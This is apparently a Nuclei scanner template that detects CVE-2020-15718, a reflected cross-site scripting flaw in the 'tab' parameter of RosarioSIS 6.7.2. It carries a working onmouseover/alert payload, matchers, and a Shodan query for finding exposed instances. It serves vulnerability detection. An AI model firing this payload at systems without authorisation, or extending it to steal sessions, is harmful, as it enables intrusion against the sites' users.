id: CVE-2020-15718

info:
  name: RosarioSIS 6.7.2 - Cross-Site Scripting
  author: 0xr2r,jarvis-survives
  severity: medium
  description: |
    RosarioSIS version 6.7.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability in the Preferences module. The 'tab' parameter in Modules.php is not properly sanitized, allowing an attacker to inject arbitrary JavaScript code via a crafted URL.
  impact: |
    An attacker can execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or other malicious actions.
  remediation: |
    Update RosarioSIS to the latest version where input validation has been improved.
  reference:
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/184944
    - https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2020-15718.md
    - https://gitlab.com/francoisjacquet/rosariosis/-/blob/mobile/CHANGES.md
    - https://gitlab.com/francoisjacquet/rosariosis/-/commit/89ae9de732024e3a2e99262aa98b400a1aa6975a
  classification:
    cve-id: CVE-2020-15718
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    epss-score: 0.06325
    epss-percentile: 0.92723
    cpe: cpe:2.3:a:rosariosis:rosariosis:6.7.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"RosarioSIS"
    product: rosariosis
    vendor: rosariosis
  tags: cve,cve2020,rosarios,xss,rosariosis,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/Modules.php?modname=Users/Preferences.php&tab="%20onmouseover=alert(document.domain)%20x="'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '" onmouseover=alert(document.domain)'
          - 'RosarioSIS'
        condition: and
        case-insensitive: true

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009725acad43ef44dd859f85af8fcba17e259abe651b6971d20a12afe84644b00502205129a9485e2dd70bfbe8e426e62af47ac73c5c99d6b84721222e5a3d98201ff3:922c64590222798bb761d5b6d8e72950